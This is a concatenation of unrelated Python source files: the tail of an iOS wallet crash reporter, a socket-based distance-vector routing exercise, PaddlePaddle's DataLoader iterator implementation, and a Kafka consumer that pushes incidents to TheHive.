#utils.NSLog("Report contents: %s", reportPretty) response = requests.post(report_server, data=report) return response.text def onOk() -> None: self.presentingViewController.dismissViewControllerAnimated_completion_(True, None) def OnSuccess(response : str) -> None: utils.NSLog("Response from server: %s", response) response = response.strip() if len(response) > 255: response = response[:255] + "..." try: response = str(utils.nsattributedstring_from_html(response).string) except: pass parent().show_message(message = response, title=_("Report Sent"), vc = self, onOk=onOk) def OnError(exc) -> None: parent().show_error(message = str(exc[1]), vc = self) utils.WaitingDialog(self, _("Sending Report..."), SendReport, OnSuccess, OnError) def _Get(vc: CrashReporterVC) -> tuple: return utils.nspy_get_byname(vc, 'exc_info') def Set(vc : CrashReporterVC, exc_info : tuple) -> None: utils.nspy_put_byname(vc, exc_info, 'exc_info') def parent() -> object: return gui.ElectrumGui.gui def _get_traceback_info(vc : CrashReporterVC) -> dict: ei = _Get(vc) if not ei: return dict() exc_string = str(ei[1]) stack = traceback.extract_tb(ei[2]) readable_trace = "".join(traceback.format_list(stack)) ident = { "file": stack[-1].filename, "name": stack[-1].name, "type": ei[0].__name__ } return { "exc_string": exc_string, "stack": readable_trace, "id": ident } def _get_additional_info(vc : CrashReporterVC) -> dict: import platform bundleVer = "iOS Build: " + str(NSBundle.mainBundle.objectForInfoDictionaryKey_("CFBundleVersion")) #xtraInfo = bundleVer + "\niOS Version String: " + utils.ios_version_string() + "\n\n" args = { "app_version": PACKAGE_VERSION + (" (%s)"%bundleVer), "python_version": sys.version, "os": platform.platform() + " " + utils.ios_version_string(), "wallet_type": "unknown", "locale": (parent().language or 'UNK'), "description": (vc.descDel.text if vc.descDel.text else "") } if len(args['os']) > 255: args['os'] = args['os'][:255] try: args["wallet_type"] = parent().wallet.wallet_type except: # Maybe the wallet isn't loaded yet pass return args def _get_report_string(vc : CrashReporterVC) -> str: info = _get_additional_info(vc) ei = _Get(vc) if not ei: return "" info["traceback"] = "".join(traceback.format_exception(*ei)) return issue_template.format(**info) ''' th = None def Test(): # testing import time def duh() -> None: raise Exception("A random exception!!") utils.call_later(2.0, duh) utils.call_later(3.0, duh) #utils.call_later(10.0, duh) def duh2() -> None: global th def thrd(): global th try: utils.NSLog("In another thread.. sleeping 5 secs") print(th) time.sleep(5.0) utils.NSLog("Woke up.. raising exception...") raise Exception("From another thread!!") finally: th = None import threading th = threading.Thread(target=thrd, name="Exception thread...", daemon=True) th.start() utils.call_later(5.0, duh2) '''
R4.py
import socket import threading import time import sys # Define constant parameters ALL_CONN = [8080,8181,8282,8383] SERVER_PORT = 8383 IP_ADDR = "127.0.40.1" ADDR = (IP_ADDR,SERVER_PORT) CLIENT_ADDR = list(IP_ADDR) CLIENT_ADDR[-1] = str(int(CLIENT_ADDR[-1]) + 1) CLIENT_ADDR = "".join(CLIENT_ADDR) CONFIG_PATH = "config.txt" NODE_NUM = 4 PING_MSG = "abcdef" PACKET_SIZE = 1024 FORMAT = "utf-8" FACTOR = 10e3 UPPER_BOUND = 10e7 # define global variables server = socket.socket() client_sockets = [] client = [socket.socket()]*4 client_addrs = [] # Initialize global router table rt = [['nil',-1,'nil']] * 4 rt[NODE_NUM-1] = [str('R'+str(NODE_NUM)),0,str('R'+str(NODE_NUM))] latencies = [0.0] * 4 # getTopology() - gets the connection details of the nodes in the network def getTopology(): # Open file file = open(CONFIG_PATH,"r") connections = [] # read the topology details line by line line = file.readline() while line: # Get list of words in the line words = line.strip().split(" ") # Get ip and port details ip_1,port_1 = words[0].split(":") ip_2,port_2 = words[1].split(":") # Update connection details if(ip_1 == IP_ADDR): connections.append([ip_2,port_2]) elif(ip_2 == IP_ADDR): connections.append([ip_1,port_1]) line = file.readline() return connections # Define function to setup server def setupServer(connections): global server global client_sockets server = socket.socket(socket.AF_INET,socket.SOCK_STREAM) server.bind(ADDR) server.listen() print(f"[LISTENING Server is listening on {IP_ADDR}]") time.sleep(5) for i in range(0,len(connections)): client_conn,cli_addr = server.accept() client_sockets.append([cli_addr,client_conn]) print(f"[NEW CONNECTION] {cli_addr} connected.") # Define the function to create client that connects with all nodes specified in the topology def createClient(connections): global client global CLIENT_ADDR i = 0 for conn in connections: addr = (conn[0],int(conn[1])) client[i] = socket.socket(socket.AF_INET,socket.SOCK_STREAM) client[i].bind((CLIENT_ADDR,SERVER_PORT)) client[i].connect(addr) CLIENT_ADDR = list(CLIENT_ADDR) CLIENT_ADDR[-1] = str(int(CLIENT_ADDR[-1]) + 1) CLIENT_ADDR = "".join(CLIENT_ADDR) i = i + 1 # Let us define th listenToPing() function that responds to incoming pings def listenToPing(conn): msg = conn.recv(1024) conn.send(msg) # Runner thread to exchange latency contribution of current node to all requesting nodes def exchangeLatency(conn, lat_str): msg = conn.recv(1024).decode(FORMAT) if(msg == "EXCHG"): conn.send(lat_str.encode(FORMAT)) # function to update the RT based on latency costs from neighbors using Bellman Ford def updateRT(index,lat_str): latency = lat_str.strip().split(",") latency = list(map(float,latency)) cost_x = rt[index][1] for i in range(0,4): updated_cost = cost_x + latency[i] if(rt[i][1] > updated_cost): # update based on min cost rt[i][1] = updated_cost rt[i][2] = str("R"+str(index+1)) # Given the current hop and destination find the next hop by calling the appropriate server def getNextHop(curr_hop,dest,conn): # First send request to node request_msg = str(dest) # time.sleep(2) conn.send(request_msg.encode(FORMAT)) # Get next hop from node next_hop = conn.recv(1024).decode(FORMAT) next_hop = next_hop.strip().split(",") return next_hop # runner function to handle next hop requests def nextHop(conn): # global client_addrs # global client_sockets while(1): req_msg = conn.recv(1024).decode(FORMAT) dest = int(req_msg) # Get next hop next_hop = rt[dest][2] # print("sada",next_hop) if(int(next_hop[1]) != dest+1): next_conn = client_sockets[client_addrs.index(int(ALL_CONN[int(rt[dest][2][-1]) - 1]))][1] next_conn.send(str(dest).encode(FORMAT)) next_hop = next_hop + "," + next_conn.recv(1024).decode(FORMAT) conn.send(next_hop.encode(FORMAT)) def main(): # STEP-1: First let us obtain the topology details from the config.txt file connections = [] connections = getTopology() num_connections = len(connections) print("[NETWORK TOPOLOGY] Number of connections =",len(connections)) for conn in connections: print("[NETWORK TOPOLOGY] ",IP_ADDR," --> ",conn[0],":",conn[1],sep ="") # STEP-2: Now that we have the server client details let us create server and client in threads thread = [0] * 2 thread[0] = threading.Thread(target = setupServer,args = [connections]) thread[0].start() time.sleep(5) thread[1] = threading.Thread(target = createClient,args = [connections]) thread[1].start() # Join both the threads thread[0].join() thread[1].join() # Sleep for 2 seconds to ensure the topology is constructed for all nodes time.sleep(2) # Find the latencies of the connections - RTT for a std message curr_connected = [int(conn[1]) for conn in connections] # First let us fill in max value for connections not connected to current node for indx in range(0,len(ALL_CONN)): if(int(ALL_CONN[indx]) not in curr_connected): latencies[indx] = UPPER_BOUND latencies[NODE_NUM - 1] = 0 # STEP-3: Now let us find the RTT of nodes connected to current node # Setup all the clients in separate threads to respond to any incoming pings ping_threads = [0] * num_connections for i in range(0,num_connections): ping_threads[i] = threading.Thread(target = listenToPing, args = [client[i]]) ping_threads[i].start() print("[NETWORK TOPOLOGY] Pinging all connected nodes ...") # Make the server ping all connections for item in client_sockets: conn = item[1] start = time.time() conn.send(PING_MSG.encode(FORMAT)) ret_msg = conn.recv(1024) end = time.time() latencies[ALL_CONN.index(int(item[0][1]))] = (end - start) * FACTOR # Join all ping threads for i in range(0,num_connections): ping_threads[i].join() print("[NETWORK TOPOLOGY] Latencies:",latencies) # STEP-4: Init the routing table print("\n[DVR] Initial Routing Table is:") print("%-20s %-25s %-20s" %("Destination","Cost (Latency)","Next Hop")) for indx in range(0,4): rt[indx] = [str('R'+str(indx+1)),latencies[indx],str('R'+str(indx+1))] print("%-20s %-25s %-20s" %(rt[indx][0],rt[indx][1],rt[indx][2])) # STEP-5: Update routing table - For 3 iterations for loop in range(0,3): print("\n******************* ITERATION -",loop+1,": ************************") # First let us setup the string to be passed from R1 (comma separated latencies) latency_str = ",".join([str(lat[1]) for lat in rt]) # Iterate over all nodes and request if connected print("\n[DVR] Exchanging Routing Information ...") for indx in range(0,4): if indx == NODE_NUM-1: continue elif ALL_CONN[indx] not in curr_connected: print("[DVR]",rt[NODE_NUM-1][0],"is not connected to",rt[indx][0]) # Setup threads to exchange the latency contributions of current code to requesting clients latency_threads = [0] * num_connections for i in range(0,num_connections): latency_threads[i] = threading.Thread(target = exchangeLatency, args = [client[i],latency_str]) latency_threads[i].start() request_msg = "EXCHG" received_lat_str = ["0,0,0,0"]*4 i = 0 for item in client_sockets: conn = item[1] conn.send(request_msg.encode(FORMAT)) received_lat_str[ALL_CONN.index(int(item[0][1]))] = conn.recv(1024).decode(FORMAT) for i in range(0,num_connections): latency_threads[i].join() print("[DVR] Received routing information is:") print(received_lat_str) # Update the router table based on the received latencies - Bellman Ford will used here for indx in range(0,4): if(received_lat_str[indx] != "0,0,0,0"): updateRT(indx,received_lat_str[indx]) print("\n[DVR] Routing Table after iteration -",loop+1,"is: ") print("%-20s %-25s %-20s" %("Destination","Cost (Latency)","Next Hop")) for indx in range(0,4): print("%-20s %-25s %-20s" %(rt[indx][0],rt[indx][1],rt[indx][2])) # Print the route for each current src - destination pair global client_addrs client_addrs = [int(item[0][1]) for item in client_sockets] # First setup the server thatll respond to requests from from any connection if any (regarding next hops) hop_threads = [0] * num_connections for i in range(0,num_connections): hop_threads[i] = threading.Thread(target = nextHop, args = [client[i]]) hop_threads[i].start() # Iterate over each destination and find the route by requesting appropriate clients for the next hop hop_list = [rt[NODE_NUM-1][0]] print("\n[DVR] Printing routing information") for i in range(0,4): if i != NODE_NUM - 1: dest = rt[i][0] next_hop = rt[i][2] hop_list.append(next_hop) while(dest not in hop_list): conn = client_sockets[client_addrs.index(ALL_CONN[int(rt[i][2][-1]) - 1])][1] next_hop = getNextHop(int(next_hop[-1])-1,i,conn) hop_list.extend(next_hop) print(*hop_list, sep=' -> ') hop_list = [rt[NODE_NUM-1][0]] # Sleep 5 seconds and then close all hop_threads time.sleep(5) if __name__ == '__main__': main()
dataloader_iter.py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import six import sys import time import signal import numbers import logging import itertools import threading import numpy as np import multiprocessing from collections import namedtuple from paddle.fluid.framework import _set_expected_place, _current_expected_place, set_flags # NOTE: queue has a different name in python2 and python3 import queue import paddle from .. import core, layers from ..framework import in_dygraph_mode from ..multiprocess_utils import _set_SIGCHLD_handler, MP_STATUS_CHECK_INTERVAL, CleanupFuncRegistrar from .fetcher import _IterableDatasetFetcher, _MapDatasetFetcher from .batch_sampler import _InfiniteIterableSampler from .collate import default_collate_fn, default_convert_fn from .worker import ParentWatchDog, get_worker_info, _worker_loop, \ _DatasetKind, _IterableDatasetStopIteration, _WorkerException, \ _ResumeIteration from .flat import _flatten_batch, _restore_batch __all__ = ['get_worker_info'] # NOTE: fix `terminate called without an active exception` # if for loop break and program exit immediately(with no model # layers processing) after iterate **the first few data** in # distributed lauch mode, distributed launch will call # terminate() to kill main process on each devices, but thread # is still iterating to fullfill blocking queue caches, which # may cause thread error `terminate called without an active # exception` for terminate is a strong singal and `__del__` # of DataLoader may not be called, so we add a global link to # the last DataLoader instance to call `__del__` to clean up # resources # NOTE: cannot simply as `__del__` to CleanupFuncRegistrar, # for this will remain a link to each DataLoader instance in # global, and will precludes GC to auto collect DataLoader # instance and will cause memory leak _loader = None def _clear_loader(): global _loader if _loader is not None: try: _loader.__del__() del _loader except: pass CleanupFuncRegistrar.register(_clear_loader) class _DataLoaderIterBase(object): """ Iterator implement of DataLoader, will load and feed mini-batch data by setting in given dataloader. Args: loader(instance of DataLoader): instance of `fluid.io.DataLoader` """ def __init__(self, loader): self._dataset = loader.dataset self._feed_list = loader.feed_list or [] self._places = loader.places self._return_list = loader.return_list self._batch_sampler = loader.batch_sampler self._drop_last = loader.drop_last self._auto_collate_batch = loader.auto_collate_batch self._num_workers = loader.num_workers self._use_buffer_reader = loader.use_buffer_reader self._use_shared_memory = loader.use_shared_memory self._timeout = loader.timeout if loader.timeout > 0 else MP_STATUS_CHECK_INTERVAL self._worker_init_fn = loader.worker_init_fn self._dataset_kind = loader.dataset_kind self._pin_memory = loader.pin_memory self._sampler_iter = iter(self._index_sampler) if self._auto_collate_batch: self._collate_fn = loader.collate_fn or default_collate_fn else: self._collate_fn = loader.collate_fn or default_convert_fn # LoDTensorBlockingQueue instance for create_py_reader and a thread # to put mini-batch data to self._blocking_queue, mini-batch data # will be get from: # 1. multi-process mode: get data from workers' result queue # 2. single-process mode: read mini-batch data in main process self._blocking_queue = None self._thread = None self._thread_done_event = threading.Event() @property def _index_sampler(self): if self._auto_collate_batch: return self._batch_sampler else: if self._dataset_kind == _DatasetKind.MAP: return list(range(len(self._dataset))) else: return _InfiniteIterableSampler(self._dataset, 1) def __iter__(self): return self def __len__(self): return len(self._batch_sampler) def _exit_thread_expectedly(self): self._thread_done_event.set() if self._blocking_queue: self._blocking_queue.close() def _exit_thread_unexpectedly(self): self._thread_done_event.set() if self._blocking_queue: self._blocking_queue.kill() class _DataLoaderIterSingleProcess(_DataLoaderIterBase): """ Single process implement of DataLoaderIter, loading data from loader.data in main process """ def __init__(self, loader): super(_DataLoaderIterSingleProcess, self).__init__(loader) self._dataset_fetcher = _DatasetKind.create_fetcher( self._dataset_kind, self._dataset, self._auto_collate_batch, self._collate_fn, self._drop_last) # NOTE: _structrue_infos used to record the data structure of # batch to restore batch structure after reading Tensor # from blocking_queue in single-process mode. Note that # only single process is used in single-process mode, we # can record the data structure sequencely in a list without # recording the send and recv index self._structure_infos = [] # NOTE: len(self._places) batch data compose as an output # iteration, set blocking_queue can cache 2 iteration datas # at most here self._blocking_queue_capacity = 1 * len(self._places) self._init_thread() self._shutdown = False global _loader _loader = self def _init_thread(self): self._var_names = [v.name for v in self._feed_list] self._shapes = [v.shape for v in self._feed_list] self._dtypes = [v.dtype for v in self._feed_list] self._need_check_feed = [ v.desc.need_check_feed() for v in self._feed_list ] # if only 1 place, do not need to keep order self._blocking_queue = core.init_lod_tensor_blocking_queue( core.Variable(), self._blocking_queue_capacity, len(self._places) > 1) self._reader = core.create_py_reader( self._blocking_queue, self._var_names, self._shapes, self._dtypes, self._need_check_feed, self._places, self._use_buffer_reader, True, self._pin_memory) self._thread = threading.Thread( target=self._thread_loop, args=(_current_expected_place(), )) self._thread.daemon = True self._thread.start() def _thread_loop(self, legacy_expected_place): #NOTE(zhiqiu): Set the expected place for new thread as the same as father thread, # and it will call platform::SetDeviceId() in c++ internally. # If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0, # Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda # APIs in this thread. _set_expected_place(legacy_expected_place) # NOTE(chenweihang): [ Why need to set not to execute pten kernel here? ] # Now, in order to ensure that the execution performance of the dynamic # graph mode in pten compatible state does not decline significantly, # we have adopted the approach of caching a KernelContext globally for # the dynamic graph tracer to reduce the construction and deconstruction # overhead of data interfaces such as the compatible state DenseTensor. # The static graph is each op caches a KernelContext, but the op of # the dynamic graph will be constructed and destroyed every round of # execution, so it is impossible to cache KernelContext for each op. # However, it is not thread-safe if using only one global kernel context in # dynamic graph. If the pten op of paddle is used in the DataLoader thread, # it may cause access errors. We temporarily do not execute pten kernel # in this scenario and will find a better solution later and remove # this setting. set_flags({'FLAGS_run_pten_kernel': False}) while not self._thread_done_event.is_set(): try: indices = next(self._sampler_iter) # read data from dataset in mini-batch # with paddle.fluid.dygraph.guard(place=paddle.CPUPlace()): # read data from dataset in mini-batch batch = self._dataset_fetcher.fetch(indices, self._thread_done_event) except StopIteration: self._exit_thread_expectedly() return if batch is None or self._thread_done_event.is_set(): break # flat batch and record structure infos batch, structure = _flatten_batch(batch) self._structure_infos.append(structure) if self._thread_done_event.is_set(): break try: # pack as LoDTensorArray array = core.LoDTensorArray() for slot in batch: if isinstance(slot, paddle.Tensor): slot = slot.value().get_tensor() elif not isinstance(slot, core.LoDTensor): tmp = core.LoDTensor() tmp.set(slot, core.CPUPlace()) slot = tmp array.append(slot) if self._thread_done_event.is_set(): break try: self._blocking_queue.push(array) except: self._exit_thread_expectedly() except: self._exit_thread_unexpectedly() six.reraise(*sys.exc_info()) self._exit_thread_expectedly() def __next__(self): try: if in_dygraph_mode(): data = self._reader.read_next_var_list() data = _restore_batch(data, self._structure_infos.pop(0)) else: if self._return_list: data = self._reader.read_next_list() for i in range(len(data)): data[i] = data[i]._move_to_list() data = [ _restore_batch(d, s) for d, s in zip(data, self._structure_infos[:len( self._places)]) ] self._structure_infos = self._structure_infos[len( self._places):] # static graph organized data on multi-device with list, if # place number is 1, there is only 1 device, extra the data # from list for devices to be compatible with dygraph mode if len(self._places) == 1: data = data[0] else: data = self._reader.read_next() return data except StopIteration: self._reader.shutdown() self._try_shutdown_all() six.reraise(*sys.exc_info()) def _shutdown_thread(self): if self._thread: self._thread_done_event.set() # NOTE: we wait for _thread exit for 3 seconds, if # thread not exit normally, force kill it for _ in range(3): if self._thread.is_alive(): time.sleep(1) else: break else: if self._thread is not threading.current_thread(): self._thread.join() self._thread = None # python2 compatibility def next(self): return self.__next__() def _try_shutdown_all(self): if not self._shutdown: try: # # _blocking_queue in keep order mode holds sub-threads # # need to release thread resources on unexpected exit if self._blocking_queue: self._blocking_queue.close() self._blocking_queue = None # NOTE: blocking queue should be closed firstly for # blocking queue read may hang and _thread_done_event # cannot be checked self._shutdown_thread() finally: self._shutdown = True def __del__(self): self._try_shutdown_all() class _DataLoaderIterMultiProcess(_DataLoaderIterBase): def __init__(self, loader): super(_DataLoaderIterMultiProcess, self).__init__(loader) self._persistent_workers = loader._persistent_workers self._resume_worker_cnt = 0 assert self._num_workers > 0, "Multi-process DataLoader " \ "invalid num_workers({})".format(self._num_workers) # subprocess wrokers' result queue self._data_queue = None # data get from _data_queue will be reordered by _rcvd_idx # for data order keeping, data index not equal _rcvd_idx # will be cached in _task_infos self._send_idx = 0 self._rcvd_idx = 0 self._batches_outstanding = 0 self._task_infos = {} self._structure_infos = [] # indices outstand as _outstanding_capacity at first, and # blocking_queue capacity is also _outstanding_capacity. # _outstanding_capacity here to make sure each indices_queue # has at least 2 indices, and outstanding batch cached # output data for at least 2 iterations(Note that len(_places) # batches will be composed as an iteration output) self._outstanding_capacity = 2 * max(self._num_workers, len(self._places)) # see _try_put_indices self._thread_lock = threading.Lock() # init workers and indices queues and put 2 indices in each indices queue self._init_workers() for _ in range(self._outstanding_capacity): self._try_put_indices() self._init_thread() self._shutdown = False def _init_workers(self): # multiprocess worker and indice queue list initial as empty self._workers = [] self._worker_status = [] self._indices_queues = [] self._workers_idx_cycle = itertools.cycle(range(self._num_workers)) # create data_queue for workers self._data_queue = multiprocessing.Queue() # event for workers and thread, thread event is only need # in multi-processing mode self._workers_done_event = multiprocessing.Event() self._thread_done_event = threading.Event() for i in range(self._num_workers): indices_queue = multiprocessing.Queue() self._indices_queues.append(indices_queue) worker = multiprocessing.Process( target=_worker_loop, args=(self._dataset, self._dataset_kind, indices_queue, self._data_queue, self._workers_done_event, self._auto_collate_batch, self._collate_fn, self._drop_last, self._worker_init_fn, i, self._num_workers, self._use_shared_memory)) worker.daemon = True worker.start() self._workers.append(worker) self._worker_status.append(True) core._set_process_pids(id(self), tuple(w.pid for w in self._workers)) _set_SIGCHLD_handler() def _clear_and_remove_data_queue(self): if self._data_queue is not None: while True: try: self._data_queue.get_nowait() except: self._data_queue.cancel_join_thread() self._data_queue.close() break def _init_thread(self): self._var_names = [v.name for v in self._feed_list] self._shapes = [v.shape for v in self._feed_list] self._dtypes = [v.dtype for v in self._feed_list] self._need_check_feed = [ v.desc.need_check_feed() for v in self._feed_list ] # if only 1 place, do not need to keep order self._blocking_queue = core.init_lod_tensor_blocking_queue( core.Variable(), self._outstanding_capacity, len(self._places) > 1) self._reader = core.create_py_reader( self._blocking_queue, self._var_names, self._shapes, self._dtypes, self._need_check_feed, self._places, self._use_buffer_reader, True, self._pin_memory) self._thread_done_event = threading.Event() # thread event is only need in multi-processing mode self._thread = threading.Thread( target=self._thread_loop, args=(_current_expected_place(), )) self._thread.daemon = True self._thread.start() def _reset(self): # resume iteration in following steps # 1. Resume workers, clear worker caches # put _ResumeIteration to all worker as resume iteration flag with self._thread_lock: self._resume_worker_cnt = self._num_workers for worker_id in range(self._num_workers): self._indices_queues[worker_id].put(_ResumeIteration()) self._batches_outstanding += 1 # all flag will be check in _thread_loop, simply wait here while self._resume_worker_cnt > 0: time.sleep(0.5) # 2. clear blocking_queue caches # in order not to restart the thread, we just clear # the blocking_queue cachees instead of recreating one while self._blocking_queue.size() >= len(self._places): if in_dygraph_mode(): self._reader.read_next_var_list() elif self._return_list: self._reader.read_next_list() else: data = self._reader.read_next() # 3. reset all states self._send_idx = 0 self._rcvd_idx = 0 self._batches_outstanding = 0 self._task_infos = {} self._structure_infos = [] # set all worker status available self._worker_status = [True] * self._num_workers # 4. reset _sampler_iter and put prefetch indices to start next epoch # init workers and indices queues and put 2 indices in each indices queue self._sampler_iter = iter(self._index_sampler) for _ in range(self._outstanding_capacity): self._try_put_indices() def _shutdown_worker(self, worker_id, shutdown=False): if self._worker_status[worker_id] or (self._persistent_workers and shutdown): self._indices_queues[worker_id].put(None) self._worker_status[worker_id] = False def _try_shutdown_all(self, timeout=None): if not self._shutdown: try: self._exit_thread_expectedly() self._clear_and_remove_data_queue() # set _workers_done_event should be set before put None # to indices_queue, workers wll exit on reading None from # indices_queue self._workers_done_event.set() for i in range(self._num_workers): self._shutdown_worker(i, shutdown=True) if not self._shutdown: for w in self._workers: w.join(timeout) for q in self._indices_queues: q.cancel_join_thread() q.close() finally: core._erase_process_pids(id(self)) self._shutdown = True def _thread_loop(self, legacy_expected_place): #NOTE(zhiqiu): Set the expected place for new thread as the same as father thread, # and it will call platform::SetDeviceId() in c++ internally. # If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0, # Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda # APIs in this thread. _set_expected_place(legacy_expected_place) # NOTE(chenweihang): See Note [ Why need to set not to execute pten kernel here? ] set_flags({'FLAGS_run_pten_kernel': False}) while not self._thread_done_event.is_set(): batch = self._get_data() if not self._thread_done_event.is_set(): if batch is None: self._exit_thread_expectedly() else: if isinstance(batch, _ResumeIteration): assert self._resume_worker_cnt > 0 self._resume_worker_cnt -= 1 continue try: # pack as LoDTensorArray array = core.LoDTensorArray() if self._use_shared_memory: for tensor in batch: array.append(tensor) else: # LoDTensor not in shared memory is not # serializable, cannot be create in workers for slot in batch: if isinstance(slot, paddle.Tensor): slot = slot.value().get_tensor() elif not isinstance(slot, core.LoDTensor): tmp = core.LoDTensor() tmp.set(slot, core.CPUPlace()) slot = tmp array.append(slot) if not self._blocking_queue.push(array): self._blocking_queue.close() except Exception as e: self._exit_thread_unexpectedly() six.reraise(*sys.exc_info()) finally: self._rcvd_idx += 1 def _get_data(self): while not self._thread_done_event.is_set(): # For IterableDataset, batch indices is generated infinitely # for each worker to raise StopIteration, but a StopIteration # raising process will discard a batch indices which is count # in _send_idx but will not increase _rcvd_idx, so we check # whether the worker is still alive here to skip the discarded # batch indices and increase _rcvd_idx if self._dataset_kind == _DatasetKind.ITER: while self._rcvd_idx < self._send_idx: info = self._task_infos[self._rcvd_idx] if len(info) == 3 or self._worker_status[info[0]]: break del self._task_infos[self._rcvd_idx] self._rcvd_idx += 1 self._batches_outstanding -= 1 else: # NOTE: in persistent workers mode, do not check data # drained here, simply let it go to _data_queue # reading to get _ResumeIteration if not self._persistent_workers: # NOTE: _rcvd_idx and _send_idx only record batches among # workers, if batches among workers drained, there # may also be data in blocking queue if self._batches_outstanding < len(self._places): return None continue if self._rcvd_idx in self._task_infos and \ len(self._task_infos[self._rcvd_idx]) == 3: info = self._task_infos.pop(self._rcvd_idx) self._structure_infos.append(info[2]) return info[1] try: # [ avoid hang ]: main process may blocking at _reader.read_next when # KeyboardInterrupt, we do following tradeoff: # 1. get data with timeout, MP_STATUS_CHECK_INTERVAL(5s) as timeout # default, if KeyboardInterrupt blocking, failed workers will be # checked and raise RuntimeError to quit DataLoader in timeout # exception handling. # 2. if get data timeout and check workers all alive, continue to # get data again data = self._data_queue.get(timeout=self._timeout) except Exception as e: # check if thread done event set when waiting data if self._thread_done_event.is_set(): continue # check failed workers failed_workers = [] for i, w in enumerate(self._workers): if self._worker_status[i] and not w.is_alive(): failed_workers.append(w) self._shutdown_worker(i) if len(failed_workers) > 0: self._exit_thread_unexpectedly() pids = ', '.join(str(w.pid) for w in failed_workers) raise RuntimeError("DataLoader {} workers exit unexpectedly, " \ "pids: {}".format(len(failed_workers), pids)) # get(timeout) will call _poll(timeout) and may raise IOError if isinstance(e, queue.Empty) or isinstance(e, IOError): # continue on timeout to keep getting data from queue continue self._exit_thread_unexpectedly() logging.error("DataLoader reader thread failed({}) to read data from " \ "workers' result queue.".format(e)) six.reraise(*sys.exc_info()) else: if self._dataset_kind == _DatasetKind.ITER and isinstance( data, _IterableDatasetStopIteration): # if a worker get StopIteraion, we shutdown this worker, # note that this batch indices to trigger StopIteration # is discard, outstanding batch number should be decrease # and another indices should be put for other workers # may still working. if self._persistent_workers: self._worker_status[data.worker_id] = False else: self._shutdown_worker(data.worker_id) self._batches_outstanding -= 1 self._try_put_indices() continue idx, batch, structure = data if isinstance(idx, _ResumeIteration) and batch is None \ and structure is None: return idx if isinstance(batch, _WorkerException): self._exit_thread_unexpectedly() batch.reraise() if idx == self._rcvd_idx: del self._task_infos[idx] self._structure_infos.append(structure) return batch else: self._task_infos[idx] += (batch, structure) continue def _try_put_indices(self): assert self._batches_outstanding <= self._outstanding_capacity, \ "too many indices have been put to queue" # In multi-process mode for IterableDataset, _try_put_indices will # be called both in main process(for our implement has blocking queue, # and blocking queue read is in main process) and thread, which may # cause error following error # 1. "ValueError: generator already executing" in next(self._sampler_iter) # 2. re-enter in increase _send_idx # add a lock for threading save, for _try_put_indices is only a slight # function which is not in data reading pipeline, this lock almost no # influence on performance with self._thread_lock: try: indices = next(self._sampler_iter) except StopIteration: return for i in range(self._num_workers): worker_idx = next(self._workers_idx_cycle) if self._worker_status[worker_idx]: break else: return self._indices_queues[worker_idx].put((self._send_idx, indices)) self._task_infos[self._send_idx] = (worker_idx, ) self._batches_outstanding += 1 self._send_idx += 1 def __del__(self): self._try_shutdown_all() def _shutdown_on_exit(self): self._try_shutdown_all(1) def __next__(self): try: # _batches_outstanding here record the total batch data number # in 'from after _try_put_indices to beforeoutput data', this # value should be _outstanding_capacity if data is not drained, # if _batches_outstanding is less than _places number, there are # no enough data to generate next output, close blocking_queue and # set _thread_done_event here, py_reader will raise StopIteration, # end workers and indices_queues in StopIteration handling if self._batches_outstanding < len(self._places): if self._persistent_workers: raise StopIteration else: self._thread_done_event.set() self._blocking_queue.close() if in_dygraph_mode(): data = self._reader.read_next_var_list() data = _restore_batch(data, self._structure_infos.pop(0)) else: if self._return_list: data = self._reader.read_next_list() for i in range(len(data)): data[i] = data[i]._move_to_list() data = [ _restore_batch(d, s) for d, s in zip(data, self._structure_infos[:len( self._places)]) ] self._structure_infos = self._structure_infos[len( self._places):] # static graph organized data on multi-device with list, if # place number is 1, there is only 1 device, extra the data # from list for devices to be compatible with dygraph mode if len(self._places) == 1: data = data[0] else: data = self._reader.read_next() self._on_output_batch() return data except StopIteration: if not self._persistent_workers: self._reader.shutdown() self._try_shutdown_all() six.reraise(*sys.exc_info()) # python2 compatibility def next(self): return self.__next__() def _on_output_batch(self): for _ in range(len(self._places)): self._batches_outstanding -= 1 self._try_put_indices()
main.py
import logging import os import sys import threading from appmetrics import metrics from socutils import get_settings from modules.app_metrics import register_app_metrics from modules.logging import prepare_logging logger = logging.getLogger('thehive_incidents_pusher') def main(settings_file_path: str = 'data/settings.yaml'): settings_file_path = os.getenv("APP_CONFIG_PATH", settings_file_path) settings = get_settings(settings_file_path) prepare_logging(settings) register_app_metrics() logger.info("Application start") logger.info("Load config from %s", settings_file_path) from modules.pusher import TheHivePusher pusher = TheHivePusher(settings['thehive'], settings['hbase_event_loader']) from modules.kafka_consumer import prepare_consumer consumer = prepare_consumer(settings) consumer.create_consumer() from modules.app_metrics import run_metrics_webserver metrics_thread = threading.Thread(target=run_metrics_webserver, daemon=True) metrics_thread.start() try: for message in consumer.read_topic(): logger.info("Read message from topic %s: %s", message.topic, str(message.value)) metrics.notify('received_kafka_messages', 1) pusher.push(message.value) logger.info("Successfully processed message") consumer.consumer.commit() except Exception as err: logger.error("Exception, which type is %s, is detecting during consuming messages: %s", type(err), str(err)) sys.exit(1) except (KeyboardInterrupt, StopIteration) as err: logger.warning("Unexpected processing interruption: %s", str(err)) sys.exit(0) except BaseException as e: logger.error("Some wtf shit is happened: %s", str(e)) sys.exit(42) if __name__ == '__main__': main()
gui.py
